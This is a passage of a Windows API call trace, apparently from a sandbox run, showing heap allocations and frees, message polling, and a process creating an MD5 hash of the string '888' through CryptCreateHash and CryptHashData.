0x2e54d28 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0130.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.101] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0130.101] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0130.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0130.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0130.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0130.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0130.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0130.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0130.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0130.104] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0130.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0130.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0130.105] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0130.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0130.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0130.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.105] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0130.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0130.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0130.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0130.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0130.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50a40 [0130.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0130.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.108] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0130.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0130.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0130.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0130.289] CryptHashData (hHash=0xa86f90, pbData=0x2e54e98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0130.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0130.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0130.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0130.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0130.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 